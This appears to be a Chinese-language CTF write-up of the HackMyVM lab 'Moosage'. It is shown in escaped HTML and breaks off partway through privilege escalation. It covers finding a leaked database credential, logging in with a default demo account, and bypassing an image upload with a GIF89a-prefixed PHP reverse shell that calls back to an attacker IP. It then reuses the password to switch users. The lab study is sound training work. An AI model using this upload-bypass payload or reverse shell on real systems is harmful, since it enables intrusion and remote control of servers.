\u989d\uff0c\u597d\u50cf\u90fd\u662f\u4e2a\u4eba\u4e3b\u9875\u3002\u3002\u3002\u770b\u4e00\u4e0b\u5728\u4e0d\u5728\u91cc\u9762\uff0c\u7136\u540e\u5c31\u6392\u5230\u4e86\uff1ahttps:\/\/github.com\/m1k1o\/blog<\/a><\/p>\n\u5bf9\u6bd4\u4e00\u4e0b\u4fe1\u606f\u641c\u96c6\u7684\u7ed3\u679c\uff0c\u53d1\u73b0\u662f\u57fa\u672c\u4e00\u6837\u7684\uff0c\u67e5\u770b\u4e00\u4e0b\u9ed8\u8ba4\u7684\u7528\u6237\u540d\u548c\u5bc6\u7801\uff0c\u770b\u770b\u662f\u5426\u5b58\u5728\u5229\u7528\u70b9\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ tree .\/blog\/\n.\/blog\/\n\u251c\u2500\u2500 ajax.php\n\u251c\u2500\u2500 app\n\u2502 \u251c\u2500\u2500 ajax.class.php\n\u2502 \u251c\u2500\u2500 config.class.php\n\u2502 \u251c\u2500\u2500 db\n\u2502 \u2502 \u251c\u2500\u2500 mysql\n\u2502 \u2502 \u2502 \u2514\u2500\u2500 01_schema.sql\n\u2502 \u2502 \u251c\u2500\u2500 postgres\n\u2502 \u2502 \u2502 \u2514\u2500\u2500 01_schema.sql\n\u2502 \u2502 \u2514\u2500\u2500 sqlite\n\u2502 \u2502 \u2514\u2500\u2500 01_schema.sql\n\u2502 \u251c\u2500\u2500 db.class.php\n\u2502 \u251c\u2500\u2500 image.class.php\n\u2502 \u251c\u2500\u2500 jbbcode\n\u2502 \u2502 \u251c\u2500\u2500 codedefinitionbuilder.class.php\n\u2502 \u2502 \u251c\u2500\u2500 codedefinition.class.php\n\u2502 \u2502 \u251c\u2500\u2500 codedefinitionset.class.php\n\u2502 \u2502 \u251c\u2500\u2500 defaultcodedefinitionset.class.php\n\u2502 \u2502 \u251c\u2500\u2500 documentelement.class.php\n\u2502 \u2502 \u251c\u2500\u2500 elementnode.class.php\n\u2502 \u2502 \u251c\u2500\u2500 inputvalidator.class.php\n\u2502 \u2502 \u251c\u2500\u2500 node.class.php\n\u2502 \u2502 \u251c\u2500\u2500 nodevisitor.class.php\n\u2502 \u2502 \u251c\u2500\u2500 parser.class.php\n\u2502 \u2502 \u251c\u2500\u2500 parserexception.class.php\n\u2502 \u2502 \u251c\u2500\u2500 textnode.class.php\n\u2502 \u2502 \u251c\u2500\u2500 tokenizer.class.php\n\u2502 \u2502 \u251c\u2500\u2500 validators\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 csscolorvalidator.class.php\n\u2502 \u2502 \u2502 \u2514\u2500\u2500 urlvalidator.class.php\n\u2502 \u2502 \u2514\u2500\u2500 visitors\n\u2502 \u2502 \u2514\u2500\u2500 nestlimitvisitor.class.php\n\u2502 \u251c\u2500\u2500 lang\n\u2502 \u2502 \u251c\u2500\u2500 bs.ini\n\u2502 \u2502 \u251c\u2500\u2500 cz.ini\n\u2502 \u2502 \u251c\u2500\u2500 de.ini\n\u2502 \u2502 \u251c\u2500\u2500 en.ini\n\u2502 \u2502 \u251c\u2500\u2500 es.ini\n\u2502 \u2502 \u251c\u2500\u2500 fr.ini\n\u2502 \u2502 \u251c\u2500\u2500 nl.ini\n\u2502 \u2502 \u251c\u2500\u2500 ru.ini\n\u2502 \u2502 \u251c\u2500\u2500 sk.ini\n\u2502 \u2502 \u2514\u2500\u2500 zh.ini\n\u2502 \u251c\u2500\u2500 lang.class.php\n\u2502 \u251c\u2500\u2500 log.class.php\n\u2502 \u251c\u2500\u2500 post.class.php\n\u2502 \u251c\u2500\u2500 splclassloader.class.php\n\u2502 \u2514\u2500\u2500 user.class.php\n\u251c\u2500\u2500 common.php\n\u251c\u2500\u2500 config.ini\n\u251c\u2500\u2500 data\n\u251c\u2500\u2500 docker-compose.yml\n\u251c\u2500\u2500 Dockerfile\n\u251c\u2500\u2500 favicon.ico\n\u251c\u2500\u2500 index.php\n\u251c\u2500\u2500 LICENSE\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 robots.txt\n\u2514\u2500\u2500 static\n \u251c\u2500\u2500 images\n \u2502 \u251c\u2500\u2500 bNvHN6v1NeH.png\n \u2502 \u251c\u2500\u2500 close.png\n \u2502 \u251c\u2500\u2500 JNPO3NqYHEj.png\n \u2502 \u251c\u2500\u2500 loading.gif\n \u2502 \u251c\u2500\u2500 next.png\n \u2502 \u251c\u2500\u2500 prev.png\n \u2502 \u251c\u2500\u2500 profile_big.jpg\n \u2502 \u251c\u2500\u2500 profile.jpg\n \u2502 \u251c\u2500\u2500 QijIVO3ZIrO.png\n \u2502 \u251c\u2500\u2500 star.png\n \u2502 \u251c\u2500\u2500 theme01\n \u2502 \u2502 \u251c\u2500\u2500 7W9WiMukPsP.png\n \u2502 \u2502 \u251c\u2500\u2500 B89i4luGsIu.png\n \u2502 \u2502 \u251c\u2500\u2500 CAGlHC-HRGh.png\n \u2502 \u2502 \u251c\u2500\u2500 Jid5DW8pIwZ.png\n \u2502 \u2502 \u251c\u2500\u2500 opUxrh_sBcu.png\n \u2502 \u2502 \u251c\u2500\u2500 pkJbsArvXFu.png\n \u2502 \u2502 \u251c\u2500\u2500 tools.png\n \u2502 \u2502 \u251c\u2500\u2500 W9Z74j1GbH2.png\n \u2502 \u2502 \u251c\u2500\u2500 wKDzFUeiPd3.png\n \u2502 \u2502 \u2514\u2500\u2500 y_KJ3X1mNCs.png\n \u2502 \u251c\u2500\u2500 theme02\n \u2502 \u2502 \u251c\u2500\u2500 2CGkY1_Ax_-.png\n \u2502 \u2502 \u251c\u2500\u2500 38mmIT7r0jG.png\n \u2502 \u2502 \u251c\u2500\u2500 7wYk0RRj5-g.png\n \u2502 \u2502 \u251c\u2500\u2500 7_Yye-V3r9M.png\n \u2502 \u2502 \u251c\u2500\u2500 amepTQ7nV0z.png\n \u2502 \u2502 \u251c\u2500\u2500 BOCzaD2rwOa.png\n \u2502 \u2502 \u251c\u2500\u2500 BvwOjzIAV9T.png\n \u2502 \u2502 \u251c\u2500\u2500 gc6VwTsu2qZ.png\n \u2502 \u2502 \u251c\u2500\u2500 HxCo9uaZIcB.png\n \u2502 \u2502 \u251c\u2500\u2500 IBOXrWGhcIu.png\n \u2502 \u2502 \u251c\u2500\u2500 jcKElmriUSj.png\n \u2502 \u2502 \u251c\u2500\u2500 kOtcUC5Tvlq.png\n \u2502 \u2502 \u251c\u2500\u2500 LiJKvoYFmUK.png\n \u2502 \u2502 \u251c\u2500\u2500 mHY-L01FIF0.png\n \u2502 \u2502 \u251c\u2500\u2500 qZPl7lx7zY1.png\n \u2502 \u2502 \u251c\u2500\u2500 THYN1-y3aPS.png\n \u2502 \u2502 \u251c\u2500\u2500 W5IvJHzSLg7.png\n \u2502 \u2502 \u251c\u2500\u2500 Xe-tUjaQ4vo.png\n \u2502 \u2502 \u251c\u2500\u2500 xGM66u5seRO.png\n \u2502 \u2502 \u2514\u2500\u2500 YFO-fzIJZ2K.png\n \u2502 \u251c\u2500\u2500 trophy.png\n \u2502 \u251c\u2500\u2500 UgNUNkKQar6.png\n \u2502 \u2514\u2500\u2500 zpEYXu5Wdu6.png\n \u251c\u2500\u2500 screenshot-theme01.png\n \u251c\u2500\u2500 screenshot-theme02-dark.png\n \u251c\u2500\u2500 screenshot-theme02-light.png\n \u251c\u2500\u2500 scripts\n \u2502 \u251c\u2500\u2500 app.js\n \u2502 \u251c\u2500\u2500 autosize.js\n \u2502 \u251c\u2500\u2500 datepick.js\n \u2502 \u251c\u2500\u2500 highlight-10.1.2.min.js\n \u2502 \u251c\u2500\u2500 jquery.min.js\n \u2502 \u2514\u2500\u2500 lightbox.js\n \u2514\u2500\u2500 styles\n \u251c\u2500\u2500 highlight-monokai-sublime.css\n \u251c\u2500\u2500 lightbox.css\n \u251c\u2500\u2500 main.css\n \u251c\u2500\u2500 theme01.css\n \u2514\u2500\u2500 theme02.css\n\n17 directories, 105 files<\/code><\/pre>\n\u9996\u5148\u770b\u4e00\u4e0b\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ cat blog\/config.ini \n[database]\ndb_connection = sqlite\n;sqlite_db = data\/sqlite.db\n\n;[database]\n;db_connection = mysql\n;mysql_socket = \/tmp\/mysql.sock\n;mysql_host = localhost\n;mysql_port = 3306\n;mysql_user = root\n;mysql_pass = root\n;db_name = blog\n\n;[database]\n;db_connection = postgres\n;postgres_socket = \/tmp\/postgres.sock\n;postgres_host = localhost\n;postgres_port = 5432\n;postgres_user = root\n;postgres_pass = root\n;db_name = blog\n\n[profile]\ntitle = Blog\nname = Max Musermann\npic_small = static\/images\/profile.jpg\npic_big = static\/images\/profile_big.jpg\n;cover = static\/images\/cover.jpg\n\n[language]\nlang = en\n\n[components]\nhighlight = true\n\n[custom]\ntheme = theme02\n;header = data\/header.html\n;styles[] = static\/styles\/custom1.css\n;styles[] = static\/styles\/custom2.css\n;scripts = static\/styles\/scripts.css\n;footer = "Edit this if you really want to remove my backlink :("\n\n[bbcode]\n;bbtags[quote] = "<quote>{param}<\/quote>"\n\n[admin] # \u7cfb\u7edf\u5f3a\u5236\u767b\u5f55\uff0c\u5e76\u9884\u8bbe\u4e86\u4e00\u4e2a\u7528\u6237\u540d\u4e3a demo\u3001\u5bc6\u7801\u4e3a demo \u7684\u6d4b\u8bd5\u8d26\u6237\nforce_login = true\nnick = demo\npass = demo\n\n[friends]\n;friends[user] = pass\n;friends[user] = pass\n\n[directories]\nimages_path = data\/i\/\nthumbnails_path = data\/t\/\nlogs_path = data\/logs\/\n\n[proxy]\n;proxy = hostname:port\n;proxyauth = username:password\n;proxytype = CURLPROXY_HTTP ; default, if not set\n;proxytype = CURLPROXY_SOCKS4\n;proxytype = CURLPROXY_SOCKS5\n\n;URL_PREFIX type:\n;proxy = http:\/\/your.page.com\/proxy.cgi?\n;proxyauth = username:password\n;proxytype = URL_PREFIX\n\n[system]\n;timezone = Europe\/Vienna\nversion = 1.42\ndebug = false\nlogs = false<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u5173\u4e8e\u7528\u6237\u4fe1\u606f\u7684\u914d\u7f6e\uff0c\u770b\u4e00\u4e0b\u9776\u673a\u7684\u6709\u54ea\u4e9b\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ cat blog\/config.ini > config1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ curl -s http:\/\/$IP\/blog\/config.ini > config2 \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ diff config1 config2 \n6,21c6,12\n< ;db_connection = mysql\n< ;mysql_socket = \/tmp\/mysql.sock\n< ;mysql_host = localhost\n< ;mysql_port = 3306\n< ;mysql_user = root\n< ;mysql_pass = root\n< ;db_name = blog\n< \n< ;[database]\n< ;db_connection = postgres\n< ;postgres_socket = \/tmp\/postgres.sock\n< ;postgres_host = localhost\n< ;postgres_port = 5432\n< ;postgres_user = root\n< ;postgres_pass = root\n< ;db_name = blog\n---\n> db_connection = mysql\n> mysql_socket = \/run\/mysqld\/mysqld.sock\n> mysql_host = localhost\n> mysql_port = 3306\n> mysql_user = baca\n> mysql_pass = youareinsane\n> db_name = moosage\n42d32\n< ;footer = "Edit this if you really want to remove my backlink :("\n75c65,66\n< version = 1.42\n---\n> system_name = blog\n> version = 1.3<\/code><\/pre>\n\u53d1\u73b0\u4e86\u7248\u672c\u4e0d\u4e00\u6837\uff0c\u4ee5\u53ca\u4e00\u4e2a\u6570\u636e\u5e93\u51ed\u8bc1\uff1abaca:youareinsane<\/code>\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728 ssh \u590d\u7528\uff0c\u4f46\u662f\u5e76\u672a\u6210\u529f\uff0c\u6ce8\u610f\u5230\u914d\u7f6e\u6587\u4ef6\u7cfb\u7edf\u5f3a\u5236\u767b\u5f55\uff0c\u5e76\u9884\u8bbe\u4e86\u4e00\u4e2a\u7528\u6237\u540d\u4e3a demo<\/code>\u3001\u5bc6\u7801\u4e3a demo<\/code> \u7684\u6d4b\u8bd5\u8d26\u6237<\/strong>\uff0c\u5c1d\u8bd5demo:demo<\/code>\u8fdb\u884c\u767b\u5f55\u3002<\/p>\n<\/div><\/p>\n\u6210\u529f\u767b\u5f55\uff01<\/p>\n
\u56fe\u7247\u9690\u85cfshell\u53cd\u5f39\uff08\u542b\u8bd5\u9519\uff09<\/h3>\n
\uff08\u4e0b\u9762\u8fdb\u884c\u4e86\u90e8\u5206\u8bd5\u9519\uff0c\u522b\u7167\u6284\u6d6a\u8d39\u65f6\u95f4\u54e6\uff09<\/strong><\/p>\n<\/div><\/p>\n\u53d1\u73b0\u5199\u6587\u7ae0\u7684\u5730\u65b9\u53ef\u4ee5\u4e0a\u4f20\u56fe\u7247\uff0c\u968f\u4fbf\u4f20\u4e00\u4e2a\u4e0a\u53bb\u770b\u770b\uff01<\/p>\n
\nPS\uff1a\u8bb0\u5f97\u6a21\u5f0f\u6539\u4e3a Public\uff01\uff01\uff01<\/strong><\/p>\n<\/blockquote>\n<\/div><\/p>\n\u53d1\u73b0\u94fe\u63a5\u5730\u5740\u4e3a\uff1a<\/p>\n
http:\/\/192.168.10.106\/blog\/data\/i\/13x5.jpg<\/code><\/pre>\n\u5c1d\u8bd5\u4e0a\u4f20\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n
<\/div><\/p>\n\u7136\u540e\u8bbe\u7f6e\u76d1\u542c\u8fdb\u884c\u4e0a\u4f20\uff0c\u53d1\u73b0\u4e0d\u5b58\u5728\u62a5\u9519\uff0c\u4f46\u662f\u5565\u90fd\u6ca1\u663e\u793a\uff0c\u968f\u4fbf\u5199\u4e2a\u9898\u76ee\u53d1\u5e03\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u5565\u90fd\u6ca1\uff0c\u73b0\u5728\u53ef\u4ee5\u5c1d\u8bd5\u4e24\u79cd\u65b9\u6cd5\uff0c\u4e00\u662f\u63a2\u7d22\u547d\u540d\u89c4\u5219\uff0c\u8fdb\u884c\u7206\u7834\u6216\u8005\u5565\uff0c\u53e6\u4e00\u79cd\u662f\u770b\u4e00\u4e0b\u8fd4\u56de\u5305\uff1a<\/p>\n
\u7531\u4e8e\u4e0a\u4e00\u4e2a\u56fe\u7247\u540d\u4e3a\uff1a13x5<\/code>\uff0c\u6240\u4ee5\u731c\u6d4b\u662f\u4fee\u6539\u4e86\u6587\u4ef6\u540d\uff0c\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\u4e24\u4f4d\u5230\u4e00\u4f4d\u7684\u7ec4\u5408\uff0c\u4ee5\u53ca\u540e\u7f00\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ for i in {1..99}; do for j in {1..99}; do url="http:\/\/192.168.10.106\/blog\/data\/i\/${i}x${j}.jpg"; curl -s -I --head "$url" | grep -q "200 OK" && echo "$url exists" || echo "$url missing"; done; done | grep -v missing\nhttp:\/\/192.168.10.106\/blog\/data\/i\/13x5.jpg exists<\/code><\/pre>\n\u53d1\u73b0\u6ca1\u627e\u5230\uff0c\u4e0a\u4f20\u4e86\u4e00\u4e0b\u53d1\u73b0gif<\/code>\u4e0a\u4f20\u8def\u5f84\u8fd8\u4e0d\u592a\u4e00\u6837\u3002\u3002\u3002<\/p>\nhttp:\/\/192.168.10.106\/blog\/data\/t\/3k94.gif<\/code><\/pre>\n\u770b\u6765\u4e0a\u4f20\u7684\u65f6\u5019\uff0c\u540e\u7f00\u4e0d\u80fd\u6539\u4e3aGIF<\/code>\u3002\u3002\u3002\u3002\u91cd\u65b0\u8fdb\u884c\u4e0a\u4f20\uff1a<\/p>\n<\/div><\/p>\n\u597d\u4e86\uff0c\u4e0d\u7528\u518d\u7ea0\u7ed3\u4e86\u3002\u3002\u3002\u3002\u3002\u4f46\u662f\u53d1\u73b0\u5e76\u672a\u8fdb\u884c\u89e3\u6790\uff0c\u4fee\u6539\u540e\u7f00\u4e3aphp\uff0c\u91cd\u65b0\u4e0a\u4f20\uff1a<\/p>\n
<\/div><\/p>\n\u6293\u5305\u6539\u5305\u8fdb\u884c\u4e0a\u4f20\uff0c\u4e2d\u9014\u53d1\u73b0\u5b58\u5728\u524d\u7aef\u8ba4\u8bc1\uff0c\u4fee\u6539\u4e00\u4e0b\u540e\u7f00\uff0c\u7b49\u4e0b\u6293\u5305\u518d\u6539\u56de\u6765\u3002\u3002\u3002\u65e9\u77e5\u9053\u76f4\u63a5\u6293\u5305\u4e86\uff0c\u4e3a\u4e86\u7701\u4e8b\u8fd8\u6d6a\u8d39\u66f4\u591a\u65f6\u95f4\u3002\u3002\u3002\u3002<\/p>\n
POST \/blog\/ajax.php?action=upload_image HTTP\/1.1\nHost: 192.168.10.106\nReferer: http:\/\/192.168.10.106\/blog\/\nOrigin: http:\/\/192.168.10.106\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/137.0.0.0 Safari\/537.36\nAccept: application\/json, text\/javascript, *\/*; q=0.01\nContent-Type: multipart\/form-data; boundary=----WebKitFormBoundaryKz0K0OZnM3LuzHDJ\nCsrf-Token: 19fbb9deda\nAccept-Language: zh-CN,zh;q=0.9\nCookie: PHPSESSID=kc59al1coqm724jhfn0139ck89\nContent-Length: 4098\n\n------WebKitFormBoundaryKz0K0OZnM3LuzHDJ\nContent-Disposition: form-data; name="file"; filename="rev.jpg"\nContent-Type: image\/jpeg\n\nGIF89a\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '192.168.10.107'; \/\/ You have changed this\n $port = 1234; \/\/ And this\n $chunk_size = 1400;\n $write_a = null;\n $error_a = null;\n $shell = 'uname -a; w; id; \/bin\/sh -i';\n $daemon = 0;\n $debug = 0;<\/code><\/pre>\n\u7136\u540e\u4fee\u6539\u4ee5\u540e\u8fdb\u884c\u4e0a\u4f20\u53d1\u73b0\u6210\u529f\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u8bbf\u95ee\u6fc0\u6d3b\uff0c\u53d1\u73b0\u4ecd\u7136\u672a\u89e3\u6790\uff1a<\/p>\n
<\/div><\/p>\n\u91cd\u65b0\u4fee\u6539\u4e0a\u4f20\u6587\u4ef6\u7c7b\u578b\uff0c\u6210\u529f\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u6fc0\u6d3b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ curl -s "http:\/\/$IP\/blog\/data\/i\/52Cp.php" \n<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u5bc6\u7801\u590d\u7528\u5207\u6362\u7528\u6237<\/h3>\n
\u4e4b\u524d\u5f97\u5230\u4e86\u6570\u636e\u5e93\u7684\u7528\u6237\u5bc6\u7801\uff0c\u90fd\u4e0d\u662f\u9ed8\u8ba4\u7684\u4e86\uff0c\u731c\u6d4b\u6709\u4fe1\u606f\u5728\u91cc\u9762\uff0c\u8fdb\u884c\u6d4b\u8bd5 baca:youareinsane<\/code>\uff1a<\/p>\n(remote) www-data@moosage:\/$ mysql -u baca -p\nEnter password: \nWelcome to the MariaDB monitor. Commands end with ; or \\g.\nYour MariaDB connection id is 66\nServer version: 10.3.27-MariaDB-0+deb10u1 Debian 10\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nMariaDB [(none)]> show databases;\n+--------------------+\n| Database |\n+--------------------+\n| information_schema |\n| moosage |\n+--------------------+\n2 rows in set (0.000 sec)\n\nMariaDB [(none)]> use moosage;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [moosage]> show tables;\n+-------------------+\n| Tables_in_moosage |\n+-------------------+\n| images |\n| posts |\n+-------------------+\n2 rows in set (0.000 sec)\n\nMariaDB [moosage]> select * from images;posts;\n+----+-------------------------------------------+-----------------+-----------------+------+----------------------------------+---------------------+--------+\n| id | name | path | thumb | type | md5 | datetime | status |\n+----+-------------------------------------------+-----------------+-----------------+------+----------------------------------+---------------------+--------+\n| 1 | 1b7fad26-6111-11eb-8b33-0242c0a820020.jpg | data\/i\/13x5.jpg | data\/t\/13x5.jpg | jpg | baaa37b759cd0838ea635e7b767667ea | 2025-06-16 10:39:10 | 1 |\n| 2 | rev.gif | NULL | NULL | gif | 766b3d09b0f7a0807e635d12a17c56c6 | 2025-06-16 10:42:16 | 0 |\n| 3 | a.gif | data\/i\/3k94.gif | data\/t\/3k94.gif | gif | e2e612fd10a8f09e56c2ba50e75f6e81 | 2025-06-16 10:54:45 | 1 |\n| 4 | rev.jpg | data\/i\/4aPK.jpg | data\/t\/4aPK.jpg | jpg | 31c7a30396940b1e65d9006261de6c25 | 2025-06-16 10:56:50 | 1 |\n| 5 | rev.php | data\/i\/52Cp.php | data\/t\/52Cp.php | php | 07d48c04c024adf4070509af119d095e | 2025-06-16 11:22:33 | 1 |\n+----+-------------------------------------------+-----------------+-----------------+------+----------------------------------+---------------------+--------+\n5 rows in set (0.000 sec)\n\nERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'posts' at line 1\nMariaDB [moosage]> use information_schema;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [information_schema]> show tables;\n+---------------------------------------+\n| Tables_in_information_schema |\n+---------------------------------------+\n| ALL_PLUGINS |\n| APPLICABLE_ROLES |\n| CHARACTER_SETS |\n| CHECK_CONSTRAINTS |\n| COLLATIONS |\n| COLLATION_CHARACTER_SET_APPLICABILITY |\n| COLUMNS |\n| COLUMN_PRIVILEGES |\n| ENABLED_ROLES |\n| ENGINES |\n| EVENTS |\n| FILES |\n| GLOBAL_STATUS |\n| GLOBAL_VARIABLES |\n| KEY_CACHES |\n| KEY_COLUMN_USAGE |\n| PARAMETERS |\n| PARTITIONS |\n| PLUGINS |\n| PROCESSLIST |\n| PROFILING |\n| REFERENTIAL_CONSTRAINTS |\n| ROUTINES |\n| SCHEMATA |\n| SCHEMA_PRIVILEGES |\n| SESSION_STATUS |\n| SESSION_VARIABLES |\n| STATISTICS |\n| SYSTEM_VARIABLES |\n| TABLES |\n| TABLESPACES |\n| TABLE_CONSTRAINTS |\n| TABLE_PRIVILEGES |\n| TRIGGERS |\n| USER_PRIVILEGES |\n| VIEWS |\n| GEOMETRY_COLUMNS |\n| SPATIAL_REF_SYS |\n| CLIENT_STATISTICS |\n| INDEX_STATISTICS |\n| INNODB_SYS_DATAFILES |\n| USER_STATISTICS |\n| INNODB_SYS_TABLESTATS |\n| INNODB_LOCKS |\n| INNODB_MUTEXES |\n| INNODB_CMPMEM |\n| INNODB_CMP_PER_INDEX |\n| INNODB_CMP |\n| INNODB_FT_DELETED |\n| INNODB_CMP_RESET |\n| INNODB_LOCK_WAITS |\n| TABLE_STATISTICS |\n| INNODB_TABLESPACES_ENCRYPTION |\n| INNODB_BUFFER_PAGE_LRU |\n| INNODB_SYS_FIELDS |\n| INNODB_CMPMEM_RESET |\n| INNODB_SYS_COLUMNS |\n| INNODB_FT_INDEX_TABLE |\n| INNODB_CMP_PER_INDEX_RESET |\n| user_variables |\n| INNODB_FT_INDEX_CACHE |\n| INNODB_SYS_FOREIGN_COLS |\n| INNODB_FT_BEING_DELETED |\n| INNODB_BUFFER_POOL_STATS |\n| INNODB_TRX |\n| INNODB_SYS_FOREIGN |\n| INNODB_SYS_TABLES |\n| INNODB_FT_DEFAULT_STOPWORD |\n| INNODB_FT_CONFIG |\n| INNODB_BUFFER_PAGE |\n| INNODB_SYS_TABLESPACES |\n| INNODB_METRICS |\n| INNODB_SYS_INDEXES |\n| INNODB_SYS_VIRTUAL |\n| INNODB_TABLESPACES_SCRUBBING |\n| INNODB_SYS_SEMAPHORE_WAITS |\n+---------------------------------------+\n76 rows in set (0.000 sec)\n\nMariaDB [information_schema]> select * from user_variables;\nEmpty set (0.000 sec)\n\nMariaDB [information_schema]> exit\nBye<\/code><\/pre>\n\u5e76\u672a\u53d1\u73b0\u6709\u7528\u4fe1\u606f\u3002\u3002\u3002\u3002\u3002\u4f46\u662f\u53d1\u73b0\u4e86\u540c\u540d\u7528\u6237\uff0c\u5c1d\u8bd5\u5bc6\u7801\u590d\u7528\u53d1\u73b0\u6210\u529f\uff1a<\/p>\n
<\/div><\/p>\n\u57fa\u7840\u4fe1\u606f\u641c\u96c6<\/h3>\nbaca@moosage:~$ ls -la\ntotal 36\ndrwxr-xr-x 3 baca baca 4096 Apr 22 2021 .\ndrwxr-xr-x 3 root root 4096 Apr 22 2021 ..\n-rw-r--r-- 1 baca baca 220 Apr 22 2021 .bash_logout\n-rw-r--r-- 1 baca baca 3526 Apr 22 2021 .bashrc\n-rwx--x--x 1 baca baca 1920 Apr 22 2021 flag.sh\ndrwxr-xr-x 3 baca baca 4096 Apr 22 2021 .local\n-rw-r--r-- 1 baca baca 807 Apr 22 2021 .profile\n-rw------- 1 baca baca 13 Apr 22 2021 user.txt\n-rw------- 1 baca baca 53 Apr 22 2021 .Xauthority\nbaca@moosage:~$ .\/flag.sh \n\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m\n-------------------------\n\\nPWNED HOST: moosage\n\\nPWNED DATE: Mon 16 Jun 2025 11:39:58 AM EDT\n\\nWHOAMI: uid=1000(baca) gid=1000(baca) groups=1000(baca),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\nFLAG: hmvmessageme\n\\n------------------------\nbaca@moosage:~$ sudo -l\nbash: sudo: command not found\nbaca@moosage:~$ whereis sudo\nsudo:\nbaca@moosage:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\nbaca@moosage:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\nbaca@moosage:~$ find \/ -type d -writable 2>\/dev\/null\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1000.slice\/user@1000.service\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1000.slice\/user@1000.service\/init.scope\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1000.slice\/user@1000.service\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1000.slice\/user@1000.service\/init.scope\n\/run\/user\/1000\n\/run\/user\/1000\/systemd\n\/run\/lock\n\/var\/lib\/php\/sessions\n\/var\/tmp\n\/home\/baca\n\/home\/baca\/.local\n\/home\/baca\/.local\/share\n\/home\/baca\/.local\/share\/nano\n\/dev\/mqueue\n\/dev\/shm\n\/proc\/1025\/task\/1025\/fd\n\/proc\/1025\/fd\n\/proc\/1025\/map_files\n\/tmp\n\/tmp\/.font-unix\n\/tmp\/.XIM-unix\n\/tmp\/.ICE-unix\n\/tmp\/.X11-unix\n\/tmp\/.Test-unix<\/code><\/pre>\n\u5c1d\u8bd5\u4e0a\u4f20linpeas.sh<\/code>\u4ee5\u53capspy64<\/code>\uff0c\u4f46\u662f\u5747\u672a\u53d1\u73b0\u5229\u7528\u70b9\uff0c\u770b\u4e00\u4e0b\u5e08\u5085\u4eec\u7684wp<\/code>\uff0c\